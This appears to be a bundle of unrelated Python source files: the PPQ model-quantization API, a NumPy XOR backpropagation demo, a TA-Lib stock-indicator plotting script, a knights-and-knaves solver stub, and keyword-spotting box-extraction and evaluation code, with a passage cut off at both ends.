caffemodel_path (str): caffe weight的保存位置 the specified lcoation of caffe weight
Returns:
BaseGraph: 解析 caffe 获得的 ppq 计算图对象 the parsed ppq IR graph
"""
ppq_ir = load_graph(file_path=prototxt_path, caffemodel_path=caffemodel_path, from_framework=NetworkFramework.CAFFE)
return format_graph(graph=ppq_ir, setting=setting)
def dump_torch_to_onnx(
model: torch.nn.Module,
onnx_export_file: str,
input_shape: List[int],
input_dtype: torch.dtype,
inputs: List[Any] = None,
device: str = 'cuda'):
"""
转换一个 torch 模型到 onnx,并保存到指定位置
convert a torch model to onnx and save to the specified location
Args:
model (torch.nn.Module): 被转换的 torch 模型 torch model used for conversion
onnx_export_file (str): 保存文件的路径 the path to save onnx model
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use keyword arg inputs for
direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
device (str, optional): 转换过程的执行设备 the execution device, defaults to 'cuda'.
"""
# set model to eval mode, stablize normalization weights.
model.eval()
if inputs is None:
dummy_input = torch.zeros(size=input_shape, device=device, dtype=input_dtype)
else: dummy_input = inputs
torch.onnx.export(
model=model, args=dummy_input,
verbose=False, f=onnx_export_file, opset_version=11,
)
@ empty_ppq_cache
def quantize_onnx_model(
onnx_import_file: str,
calib_dataloader: DataLoader,
calib_steps: int,
input_shape: List[int],
input_dtype: torch.dtype = torch.float,
inputs: List[Any] = None,
setting: QuantizationSetting = None,
collate_fn: Callable = None,
platform: TargetPlatform = TargetPlatform.DSP_INT8,
device: str = 'cuda',
verbose: int = 0,
do_quantize: bool = True,
) -> BaseGraph:
"""
量化一个 onnx 原生的模型
输入一个 onnx 模型的文件路径
返回一个量化后的 PPQ.IR.BaseGraph
quantize onnx model, input onnx model and return quantized ppq IR graph
Args:
onnx_import_file (str): 被量化的 onnx 模型文件路径 onnx model location
calib_dataloader (DataLoader): 校准数据集 calibration data loader
calib_steps (int): 校准步数 calibration steps
collate_fn (Callable): 校准数据的预处理函数 batch collate func for preprocessing
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use
keyword arg inputs for direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
setting (OptimSetting): 量化配置信息,用于配置量化的各项参数,设置为 None 时加载默认参数。
Quantization setting, default setting will be used when set None
do_quantize (Bool, optional): 是否执行量化 whether to quantize the model, defaults to True.
platform (TargetPlatform, optional): 量化的目标平台 target backend platform, defaults to TargetPlatform.DSP_INT8.
device (str, optional): 量化过程的执行设备 execution device, defaults to 'cuda'.
verbose (int, optional): 是否打印详细信息 whether to print details, defaults to 0.
Raises:
ValueError: 给定平台不可量化 the given platform doesn't support quantization
KeyError: 给定平台不被支持 the given platform is not supported yet
Returns:
BaseGraph: 量化后的IR,包含了后端量化所需的全部信息
The quantized IR, containing all information needed for backend execution
"""
if not TargetPlatform.is_quantized_platform(platform=platform):
raise ValueError(f'Target Platform {platform} is an non-quantable platform.')
if platform not in QUANTIZER_COLLECTION:
raise KeyError(f'Target Platform {platform} is not supported by ppq right now.')
if do_quantize:
if calib_dataloader is None or calib_steps is None:
raise TypeError('Quantization needs a valid calib_dataloader and calib_steps setting.')
if setting is None:
setting = QuantizationSettingFactory.default_setting()
ppq_ir = load_onnx_graph(onnx_import_file=onnx_import_file, setting=setting)
if inputs is None:
dummy_input = torch.zeros(size=input_shape, device=device, dtype=input_dtype)
else: dummy_input = inputs
quantizer = QUANTIZER_COLLECTION[platform](graph=ppq_ir)
assert isinstance(quantizer, BaseQuantizer)
executor = TorchExecutor(graph=quantizer._graph, device=device)
if do_quantize:
quantizer.quantize(
inputs=dummy_input,
calib_dataloader=calib_dataloader,
executor=executor,
setting=setting,
calib_steps=calib_steps,
collate_fn=collate_fn
)
if verbose: quantizer.report()
return quantizer._graph
else:
return quantizer._graph
@ empty_ppq_cache
def quantize_torch_model(
model: torch.nn.Module,
calib_dataloader: DataLoader,
calib_steps: int,
input_shape: List[int],
input_dtype: torch.dtype = torch.float,
setting: QuantizationSetting = None,
collate_fn: Callable = None,
inputs: List[Any] = None,
do_quantize: bool = True,
platform: TargetPlatform = TargetPlatform.DSP_INT8,
onnx_export_file: str = 'onnx.model',
device: str = 'cuda',
verbose: int = 0,
) -> BaseGraph:
"""
量化一个 Pytorch 原生的模型
输入一个 torch.nn.Module
返回一个量化后的 PPQ.IR.BaseGraph
quantize a pytorch model, input pytorch model and return quantized ppq IR graph
Args:
model (torch.nn.Module): 被量化的 torch 模型(torch.nn.Module) the pytorch model
calib_dataloader (DataLoader): 校准数据集 calibration dataloader
calib_steps (int): 校准步数 calibration steps
collate_fn (Callable): 校准数据的预处理函数 batch collate func for preprocessing
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use
keyword arg inputs for direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
setting (OptimSetting): 量化配置信息,用于配置量化的各项参数,设置为 None 时加载默认参数。
Quantization setting, default setting will be used when set None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
do_quantize (Bool, optional): 是否执行量化 whether to quantize the model, defaults to True, defaults to True.
platform (TargetPlatform, optional): 量化的目标平台 target backend platform, defaults to TargetPlatform.DSP_INT8.
device (str, optional): 量化过程的执行设备 execution device, defaults to 'cuda'.
verbose (int, optional): 是否打印详细信息 whether to print details, defaults to 0.
Raises:
ValueError: 给定平台不可量化 the given platform doesn't support quantization
KeyError: 给定平台不被支持 the given platform is not supported yet
Returns:
BaseGraph: 量化后的IR,包含了后端量化所需的全部信息
The quantized IR, containing all information needed for backend execution
"""
# dump pytorch model to onnx
dump_torch_to_onnx(model=model, onnx_export_file=onnx_export_file,
input_shape=input_shape, input_dtype=input_dtype,
inputs=inputs, device=device)
return quantize_onnx_model(onnx_import_file=onnx_export_file,
calib_dataloader=calib_dataloader, calib_steps=calib_steps, collate_fn=collate_fn,
input_shape=input_shape, input_dtype=input_dtype, inputs=inputs, setting=setting,
platform=platform, device=device, verbose=verbose, do_quantize=do_quantize)
@ empty_ppq_cache
def quantize_caffe_model(
caffe_proto_file: str,
caffe_model_file: str,
calib_dataloader: DataLoader,
calib_steps: int,
input_shape: List[int],
input_dtype: torch.dtype = torch.float,
setting: QuantizationSetting = None,
collate_fn: Callable = None,
inputs: List[Any] = None,
do_quantize: bool = True,
platform: TargetPlatform = TargetPlatform.DSP_INT8,
device: str = 'cuda',
verbose: int = 0,
) -> BaseGraph:
"""
量化一个 caffe 原生的模型
输入一个 caffe 模型的文件路径和权重路径
返回一个量化后的 PPQ.IR.BaseGraph
quantize caffe model, input caffe prototxt and weight path, return a quantized ppq graph
Args:
caffe_proto_file (str): 被量化的 caffe 模型文件 .prototxt 路径
caffe prototxt location
caffe_model_file (str): 被量化的 caffe 模型文件 .caffemodel 路径
caffe weight location
calib_dataloader (DataLoader): 校准数据集 calibration data loader
calib_steps (int): 校准步数 calibration steps
collate_fn (Callable): 校准数据的预处理函数 batch collate func for preprocessing
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use
keyword arg inputs for direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
setting (OptimSetting): 量化配置信息,用于配置量化的各项参数,设置为 None 时加载默认参数。
Quantization setting, default setting will be used when set None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
do_quantize (Bool, optional): 是否执行量化 whether to quantize the model, defaults to True, defaults to True.
platform (TargetPlatform, optional): 量化的目标平台 target backend platform, defaults to TargetPlatform.DSP_INT8.
device (str, optional): 量化过程的执行设备 execution device, defaults to 'cuda'.
verbose (int, optional): 是否打印详细信息 whether to print details, defaults to 0.
Raises:
ValueError: 给定平台不可量化 the given platform doesn't support quantization
KeyError: 给定平台不被支持 the given platform is not supported yet
Returns:
BaseGraph: 量化后的IR,包含了后端量化所需的全部信息
The quantized IR, containing all information needed for backend execution
"""
if not TargetPlatform.is_quantized_platform(platform=platform):
raise ValueError(f'Target Platform {platform} is an non-quantable platform.')
if platform not in QUANTIZER_COLLECTION:
raise KeyError(f'Target Platform {platform} is not supported by ppq right now.')
if do_quantize:
if calib_dataloader is None or calib_steps is None:
raise TypeError('Quantization needs a valid calib_dataloader and calib_steps setting.')
if setting is None:
setting = QuantizationSettingFactory.default_setting()
ppq_ir = load_graph(file_path=caffe_proto_file,
caffemodel_path=caffe_model_file,
from_framework=NetworkFramework.CAFFE)
ppq_ir = format_graph(ppq_ir, setting=setting)
if inputs is None:
dummy_input = torch.zeros(size=input_shape, device=device, dtype=input_dtype)
else: dummy_input = inputs
quantizer = QUANTIZER_COLLECTION[platform](graph=ppq_ir)
assert isinstance(quantizer, BaseQuantizer)
executor = TorchExecutor(graph=quantizer._graph, device=device)
if do_quantize:
quantizer.quantize(
inputs=dummy_input,
calib_dataloader=calib_dataloader,
executor=executor,
setting=setting,
calib_steps=calib_steps,
collate_fn=collate_fn
)
if verbose: quantizer.report()
return quantizer._graph
else:
return quantizer._graph
def export_ppq_graph(
graph: BaseGraph, platform: TargetPlatform,
graph_save_to: str, config_save_to: str = None, **kwargs) -> None:
"""
使用这个函数将 PPQ ir 保存到文件,同时导出 PPQ 的量化配置信息。
该函数可以将 PPQ ir 保存为不同格式的模型文件。
this func dumps ppq IR to file, and exports quantization setting information simultaneously
详细的支持情况请参考:ppq.parser.__ini__.py
for details please refer to ppq.parser.__ini__.py
Args:
graph (BaseGraph): 被保存的 ir
the ppq IR graph
platform (TargetPlatform): 期望部署的目标平台
target backend platform
graph_save_to (str): 模型保存文件名
filename to save
config_save_to (str): 量化配置信息保存文件名。
注意部分平台导出时会将量化配置信息直接写入模型,在这种情况下设置此参数无效
note that some of platforms requires to write quantization setting
directly into the model file, this parameter won't have effect at
this situation
"""
for save_path in [graph_save_to, config_save_to]:
if save_path is None: continue
if os.path.exists(save_path):
if os.path.isfile(save_path):
ppq_warning(f'File {save_path} has already exist, ppq exporter will overwrite it.')
if os.path.isdir(save_path):
raise FileExistsError(f'File {save_path} has already exist, and it is a directory, '
'ppq exporter can not create file here.')
dump_graph_to_file(file_path=graph_save_to, config_path=config_save_to,
target_platform=platform, graph=graph)
def format_graph(graph: BaseGraph, setting: QuantizationSetting) -> BaseGraph:
"""
这个函数将对读入的计算图进行预处理 this func will preprocess the loaded computational graph
所有的算子将被规范化,将符合 PPQ 的定义标准 all operators will be regularized
计算图将被切分并调度到不同设备 operators will be dispatched to different devices
"""
# do graph level optimization
formatter = GraphDeviceSwitcher(GraphFormatter(GraphMerger(graph)))
if str(setting.dispatcher).lower() not in DISPATCHER_TABLE:
raise ValueError(f'Can not found dispatcher type "{setting.dispatcher}", check your input again.')
dispatcher = DISPATCHER_TABLE[str(setting.dispatcher).lower()]
formatter(GraphCommand(GraphCommandType.FORMAT_CONSTANT_INPUT))
formatter(GraphCommand(GraphCommandType.FUSE_CONV_BN))
formatter(GraphCommand(GraphCommandType.FORMAT_PARAMETERS))
formatter(GraphCommand(GraphCommandType.FORMAT_CAST))
formatter(GraphCommand(GraphCommandType.DELETE_ISOLATED))
# dispatching.
dispatching_table = dispatcher.dispatch(
graph, quant_platform=TargetPlatform.UNSPECIFIED,
fp32_platform=TargetPlatform.FP32,
SOI_platform=TargetPlatform.SHAPE_OR_INDEX)
# override dispatching result with setting
dispatching_override = setting.dispatching_table
for dispatching in dispatching_override.dispatchings:
if dispatching.operation not in graph.operations: continue
assert isinstance(dispatching.platform, int), (
f'Your dispatching table contains a invalid setting of operation {dispatching.operation}, '
'All platform setting given in dispatching table is expected given as int, '
f'however {type(dispatching.platform)} was given.')
dispatching_table[dispatching.operation] = TargetPlatform(dispatching.platform)
for operation in graph.operations.values():
assert operation.name in dispatching_table, (
f'Internal Error, Can not find operation {operation.name} in dispatching table.')
operation.platform = dispatching_table[operation.name]
# insert necessary device switchers.
formatter(GraphCommand(GraphCommandType.INSERT_SWITCHER))
return graph
__all__ = ['load_onnx_graph', 'load_caffe_graph', 'dump_torch_to_onnx', 'quantize_onnx_model',
'quantize_torch_model', 'export_ppq_graph', 'format_graph']
``` |
{
"source": "Joker2770/My_TensorFlow_Lab",
"score": 2
} |
#### File: src/tf1.x/_07_BPXOR.py
```python
import numpy as np
import matplotlib.pyplot as plt
# 输入数据
X = np.array([[0,0],[0,1], [1,0],[1,1]])
# 标签
T = np.array([[0],[1],[1],[0]])
# 定义一个2层的神经网络:2-10-1
# 输入层2个神经元,隐藏层10个神经元,输出层1个神经元
# 输入层到隐藏层的权值初始化,2行10列
W1 = np.random.random([2,10])
# 隐藏层到输出层的权值初始化,10行1列
W2 = np.random.random([10,1])
# 初始化偏置值,偏置值的初始化一般可以取0,或者一个比较小的常数,如0.1
# 隐藏层的10个神经元偏置
b1 = np.zeros([10])
# 输出层的1个神经元偏置
b2 = np.zeros([1])
# 学习率设置
lr = 0.1
# 定义训练周期数
epochs = 100001
# 定义测试周期数
test = 5000
# 定义sigmoid函数
def sigmoid(x):
return 1/(1+np.exp(-x))
# 定义sigmoid函数导数
def dsigmoid(x):
return x*(1-x)
# 更新权值和偏置值
def update():
global X,T,W1,W2,lr,b1,b2
# 隐藏层输出
L1 = sigmoid(np.dot(X,W1) + b1)
# 输出层输出
L2 = sigmoid(np.dot(L1,W2) + b2)
# 根据公式2.41,求输出层的学习信号
delta_L2 = (T - L2)*dsigmoid(L2)
# 根据公式2.42,求隐藏层的学习信号
delta_L1 = delta_L2.dot(W2.T)*dsigmoid(L1)
# 根据公式2.44,求隐藏层到输出层的权值改变
# 由于一次计算了多个样本,所以需要求平均
delta_W2 =lr*(L1.T.dot(delta_L2))/X.shape[0]
# 根据公式2.45,求输入层到隐藏层的权值改变
# 由于一次计算了多个样本,所以需要求平均
delta_W1 =lr*(X.T.dot(delta_L1))/X.shape[0]
# 更新权值
W2 = W2 + delta_W2
W1 = W1 + delta_W1
# 改变偏置值
# 由于一次计算了多个样本,所以需要求平均
b2 =b2 +lr*np.mean(delta_L2, axis=0)
b1 =b1 +lr*np.mean(delta_L1, axis=0)
# 定义空list用于保存loss
loss = []
# 训练模型
for i in range(epochs):
# 更新权值
update()
# 每训练5000次计算一次loss值
if i%test == 0:
# 隐藏层输出
L1 = sigmoid(np.dot(X,W1) + b1)
# 输出层输出
L2 =sigmoid(np.dot(L1,W2) + b2)
# 计算loss值
print('epochs',i,'loss',np.mean(np.square(T - L2)/2))
# 保存loss值
loss.append(np.mean(np.square(T - L2)/2))
# 画图训练周期数与loss的关系图
plt.plot(range(0,epochs,test),loss)
plt.xlabel('epochs')
plt.ylabel('loss')
plt.show()
# 隐藏层输出
L1 = sigmoid(np.dot(X,W1) + b1)
# 输出层输出
L2 = sigmoid(np.dot(L1,W2) + b2)
print('output')
print(L2)
# 因为最终的分类只有0和1,所以我们可以把
# 大于等于0.5的值归为1类,小于0.5的值归为0类
def predict(x):
if x>=0.5:
return 1
else:
return 0
# map会根据提供的函数对指定序列做映射
# 相当于依次把L2中的值放到predict函数中计算
# 然后打印出结果
print('predict')
for i in map(predict,L2):
print(i)
``` |
{
"source": "Joker2770/stock_analysis_cn",
"score": 3
} |
#### File: stock_analysis_cn/src/talib_simple_usage.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#正常显示画图时出现的中文和负号
from pylab import mpl
mpl.rcParams['font.sans-serif']=['SimHei']
mpl.rcParams['axes.unicode_minus']=False
#引入TA-Lib库
import talib as ta
#获取交易数据用于示例分析
import tushare as ts
#1.2.48
print(ts.__version__)
###################################################
'''
股票代码
'''
stock_code = "000001"
'''
起始日期
'''
start_time = "2019-08-01"
###################################################
def get_data(code,start='2015-01-01'):
df=ts.get_k_data(code,start)
df.index=pd.to_datetime(df.date)
df=df.sort_index()
return df
#获取上证指数收盘价、最高、最低价格
df=get_data(stock_code)[['open','close','high','low']]
#开盘价,最高价,最低价,收盘价的均值
df['average']=ta.AVGPRICE(df.open,df.high,df.low,df.close)
#最高价,最低价的均值
df['median']=ta.MEDPRICE(df.high,df.low)
#最高价,最低价,收盘价的均值
df['typical']=ta.TYPPRICE(df.high,df.low,df.close)
#最高价,最低价,收盘价的加权
df['weight']=ta.WCLPRICE(df.high,df.low,df.close)
df.head()
'''
通用函数名:MA
代码:ta.MA(close,timeperiod=30,matype=0)
移动平均线系列指标包括:SMA简单移动平均线、
EMA指数移动平均线、
WMA加权移动平均线、
DEMA双移动平均线、
TEMA三重指数移动平均线、
TRIMA三角移动平均线、
KAMA考夫曼自适应移动平均线、
MAMA为MESA自适应移动平均线、
T3三重指数移动平均线。
其中,close为收盘价,时间序列,timeperiod为时间短,默认30天,指标类型matype分别对应:0=SMA, 1=EMA, 2=WMA, 3=DEMA, 4=TEMA, 5=TRIMA, 6=KAMA, 7=MAMA, 8=T3 (Default=SMA)
'''
types=['SMA','EMA','WMA','DEMA','TEMA',
'TRIMA','KAMA','MAMA','T3']
df_ma=pd.DataFrame(df.close)
for i in range(len(types)):
df_ma[types[i]]=ta.MA(df.close,timeperiod=5,matype=i)
df_ma.tail()
df_ma.loc[start_time:].plot(figsize=(12,6))
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
plt.title('上证指数各种类型移动平均线',fontsize=15)
plt.xlabel('')
plt.show()
'''
计算方法:首先计出过去 N 日收巿价的标准差 SD(Standard Deviation) ,通常再乘 2 得出 2 倍标准差
, Up 线为 N日平均线加 2 倍标准差, Down 线则为 N日平均线减 2 倍标准差。
代码:ta.BBANDS(close, timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)
'''
H_line,M_line,L_line=ta.BBANDS(df.close, timeperiod=20, nbdevup=2, nbdevdn=2, matype=0)
df1=pd.DataFrame(df.close,index=df.index,columns=['close'])
df1['H_line']=H_line
df1['M_line']=M_line
df1['L_line']=L_line
df1.tail()
df1.loc[start_time:].plot(figsize=(12,6))
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
plt.title(u'上证指数布林线',fontsize=15)
plt.xlabel('')
plt.show()
#画5、30、120、250指数移动平均线
N=[5,30,120,250]
for i in N:
df['ma_'+str(i)]=ta.EMA(df.close,timeperiod=i)
df.tail()
df.loc[start_time:,['close','ma_5','ma_30','ma_120','ma_250']].plot(figsize=(12,6))
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
plt.title('上证指数走势',fontsize=15)
plt.xlabel('')
plt.show()
``` |
{
"source": "joker314/knights-and-knaves",
"score": 4
} |
#### File: joker314/knights-and-knaves/main.py
```python
class Person:
def __init__(self, is_truthful):
self.truthful: bool = bool(int(is_truthful))
def said(self, claim):
return claim if self.truthful else not claim
def is_liar(self):
return not self.truthful
def is_truth_teller(self):
return self.truthful
def __eq__(self, person):
return self.truthful == person.truthful
def __ne__(self, person):
return self.truthful != person.truthful
def list_solutions(num_of_people: int, check_function):
"""
Brute force checks all 2^n states and return those that are valid.
:param num_of_people: The number of people in this scenario.
:param check_function: The function the array will be passed to, to check if it conforms to the problem.
:return: A list of possible binary state strings, where each digit corresponds to the truthiness of a person.
"""
solutions: list[str] = []
# There are 2^n possible outcomes.
for state in range(2 ** num_of_people):
# Remove "0b" and pad to length "num_of_people", to create a bitarray representing truth tellers and liars.
binary_repr: str = bin(state)[2:].zfill(num_of_people)
# Create the world of people possible with this configuration.
possible_world: list[Person] = [Person(c) for c in binary_repr]
if check_function(possible_world):
solutions.append(binary_repr)
return solutions
# Your code goes below! Describe the problem and it should solve it.
``` |
{
"source": "joker452/Keyword-spotting-system",
"score": 3
} |
#### File: Keyword-spotting-system/locator/dtp.py
```python
import os
import cv2
from threading import Thread, Lock
from queue import Queue
import numpy as np
from PIL import Image, ImageDraw
def extract_regions(t_img, c_range, r_range, w_range, h_range):
all_boxes = []
min_w, max_w = w_range
min_h, max_h = h_range
for r in r_range:
for c in c_range:
s_img = cv2.morphologyEx(t_img, cv2.MORPH_CLOSE, np.ones((r, c), dtype=np.ubyte))
n, l_img, stats, centroids = cv2.connectedComponentsWithStats(s_img, connectivity=4)
boxes = [[b[0], b[1], b[0] + b[2], b[1] + b[3]] for b in stats
if min_w <= b[2] <= max_w and min_h <= b[3] <= max_h]
all_boxes += boxes
return all_boxes
def find_regions(img, threshold_range, c_range, r_range, w_range, h_range):
"""
Extracts DTP from an image using different thresholds and morphology kernels
"""
ims = []
for t in threshold_range:
ims.append((img < t).astype(np.ubyte))
ab = []
for t_img in ims:
ab += extract_regions(t_img, c_range, r_range, w_range, h_range)
return ab
def unique_boxes(boxes):
tmp = np.array(boxes)
ncols = tmp.shape[1]
dtype = tmp.dtype.descr * ncols
struct = tmp.view(dtype)
uniq, index = np.unique(struct, return_index=True)
tmp = uniq.view(tmp.dtype).reshape(-1, ncols)
return tmp, index
def extract_dtp(out_dir, file_names, c_range, r_range, w_range, h_range, multiple_thresholds=True):
# extract regions
lock = Lock()
q = Queue()
for i, file_name in enumerate(file_names):
q.put((i, file_name))
def worker():
while True:
i, file_name = q.get()
lock.acquire()
print('Processing image %d / %d' % (i, len(file_names)))
lock.release()
try:
img = cv2.imread(file_name, cv2.IMREAD_GRAYSCALE)
image = Image.fromarray(img)
d = ImageDraw.Draw(image)
m = img.mean()
if multiple_thresholds:
threshold_range = np.arange(0.7, 1.2, 0.1) * m
else:
threshold_range = np.array([0.9]) * m
region_proposals = find_regions(img, threshold_range, c_range, r_range, w_range, h_range)
region_proposals, _ = unique_boxes(region_proposals)
total = 0
regions = []
for region in region_proposals:
x1, y1, x2, y2 = region
d.rectangle([x1, y1, x2, y2], outline="white")
total += 1
regions.append((x1, y1, x2, y2))
save_name = os.path.normpath(file_name).split(os.sep)
save_name = save_name[-1].split('.')[0]
name = out_dir + save_name + '_dtp.npz'
np.savez_compressed(name, regions=regions, total=total)
image.save(os.path.join(out_dir, 'image', save_name + '.jpg'))
except:
lock.acquire()
print('exception thrown with file', file_name)
lock.release()
q.task_done()
num_workers = 8
for i in range(num_workers):
t = Thread(target=worker)
t.daemon = True
t.start()
q.join()
if __name__ == '__main__':
image_dir = '/data2/dengbowen/color_out'
image_names = [os.path.join(image_dir, f) for f in os.listdir(image_dir) if f.endswith('.jpg')]
out_dir = "/data2/dengbowen/difangzhi_dtp/"
c_range = list(range(1, 80, 5))
r_range = list(range(1, 75, 5))
w_range = (33, 284)
h_range = (44, 310)
extract_dtp(out_dir, image_names, c_range, r_range, w_range, h_range, multiple_thresholds=True)
```
#### File: locator/OCR/evaluate_box.py
```python
import os
import numpy as np
import torch
from PIL import Image, ImageDraw
def bbox_overlaps(boxes, query_boxes):
"""
Parameters
----------
all boxes form: x1, y1, x2, y2
boxes: (N, 4) ndarray
query_boxes: (K, 4) ndarray
Returns
-------
overlaps: (N, K) overlap between boxes and query_boxes
from https://github.com/ruotianluo/pytorch-faster-rcnn/blob/master/lib/utils/bbox.py
"""
boxes = torch.as_tensor(boxes, dtype=torch.float64)
query_boxes = torch.as_tensor(query_boxes, dtype=torch.float64)
# (N,)
box_areas = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])
# (K,)
query_areas = (query_boxes[:, 2] - query_boxes[:, 0]) * (query_boxes[:, 3] - query_boxes[:, 1])
iw = (torch.min(boxes[:, 2:3], query_boxes[:, 2:3].t()) - torch.max(boxes[:, 0:1], query_boxes[:, 0:1].t())).clamp(
min=0)
ih = (torch.min(boxes[:, 3:4], query_boxes[:, 3:4].t()) - torch.max(boxes[:, 1:2], query_boxes[:, 1:2].t())).clamp(
min=0)
ua = box_areas.view(-1, 1) + query_areas.view(1, -1) - iw * ih
overlaps = iw * ih / ua
return overlaps
def evaluate(gt_dir, detect_dir, threshold):
gt_box_files = os.listdir(gt_dir)
re = []
pr = []
for i, file_name in enumerate(gt_box_files):
gt_boxes = []
detect_boxes = []
with open(os.path.join(gt_dir, file_name), 'r', encoding='utf-8') as f:
for line in f:
gt_boxes.append(list(map(int, line.split()[0: 4])))
try:
with open(os.path.join(detect_dir, file_name), 'r', encoding='utf-8') as f:
for line in f:
detect_boxes.append(list(map(int, line.split()[0: 4])))
except:
print("%s not found!" % os.path.join(detect_dir, file_name))
input_boxes = np.asarray(detect_boxes[::-1])
target_boxes = np.asarray(gt_boxes)
B1 = input_boxes.shape[0]
B2 = target_boxes.shape[0]
ious = bbox_overlaps(input_boxes, target_boxes).view(1, B1, B2)
# N x B2
# find the input boxes having max overlap with each gt box
target_max_iou, target_idx = torch.max(ious, dim=1)
pos_mask = torch.gt(target_max_iou, threshold)
TP = 0
box_id, index = target_idx.sort()
i = 0
l = box_id.size(1)
while i < l:
current_max = target_max_iou[0][index[0][i].item()]
j = i + 1
while j < l and box_id[0][j] == box_id[0][i]:
temp = target_max_iou[0][index[0][j].item()]
current_max = temp if temp > current_max else current_max
j += 1
if current_max > threshold:
TP += 1
i = j
recall = TP / B2
precision = TP / B1
re.append(recall)
pr.append(precision)
print(file_name + " TP:{} Total Detection:{} Total GT:{}".format(TP, B1, B2), end='')
print(" Recall:{:.2%}".format(recall), end='')
print(" Precision:{:.2%}".format(precision))
print("*" * 30)
print("Avg recall:{:.2%} Avg precision:{:.2%}".format(sum(re) / len(re), sum(pr) / len(pr)))
if __name__ == '__main__':
evaluate('c:/users/deng/desktop/g', 'c:/users/deng/desktop/d', 0.5)
```
#### File: Keyword-spotting-system/locator/preprocess.py
```python
import os
import cv2
import shutil
import numpy as np
from PIL import ImageDraw, Image
from utils.util import mkdir
def binary_fillhole(img):
# blackhat
element = cv2.getStructuringElement(cv2.MORPH_CROSS, (33, 33), anchor=(16, 16))
img = cv2.morphologyEx(img, cv2.MORPH_BLACKHAT, element)
h, w, _ = img.shape
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# otsu binary
cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU, dst=img)
# fill small holes
element = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))
img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, element)
return img
def find_region(row_value_threshold, col_value_threshold, row_range_threshold, col_range_threshold, need_range):
global h, w
row_candidate = np.argwhere(row_sum > row_value_threshold * w * 255)
col_candidate = np.argwhere(col_sum > col_value_threshold * h * 255)
row_start = col_start = 0
row_end = h
col_end = w
if need_range:
if row_candidate.size > 0:
start_candidate = row_candidate[row_candidate < row_range_threshold[0] * h]
end_candidate = row_candidate[row_candidate > row_range_threshold[1] * h]
if start_candidate.size > 0:
row_start = start_candidate[0]
if end_candidate.size > 0:
row_end = end_candidate[0]
if col_candidate.size > 0:
start_candidate = col_candidate[col_candidate < col_range_threshold[0] * w]
end_candidate = col_candidate[col_candidate > col_range_threshold[1] * w]
if start_candidate.size > 0:
col_start = start_candidate[0]
if end_candidate.size > 0:
col_end = end_candidate[0]
else:
row_start, row_end = row_candidate[0][0], row_candidate[-1][0]
col_start, col_end = col_candidate[0][0], col_candidate[-1][0]
return row_start, col_start, row_end, col_end
# \\ is requried at the end of the path
img_dir = r"c:\Users\Deng\Desktop\difangzhi\out\\"
images = [img_dir + f.name for f in os.scandir(img_dir) if f.name.endswith("jpg")]
images.sort(key=lambda item: (len(item), item))
mkdir("bw_out")
mkdir("color_out")
for i, image_path in enumerate(images):
text_path = img_dir + image_path.split('\\')[-1][: -3] + 'txt'
color_img = cv2.imread(image_path)
img = np.copy(color_img)
img = binary_fillhole(img)
h, w = img.shape
row_sum = np.sum(img, 1)
col_sum = np.sum(img, 0)
row_start, col_start, row_end, col_end = find_region(0.5, 0.5, (0.35, 0.7), (0.35, 0.9), True)
if row_start == 0 or col_start == 0:
row_start, col_start, row_end, col_end = find_region(0.01, 0.02, (0, 0), (0, 0), False)
new_lines = []
with open(text_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
line_split = line.split()
x1, y1, x2, y2 = map(int, line_split[0: 4])
x1 -= col_start
y1 -= row_start
x2 -= col_start
y2 -= row_start
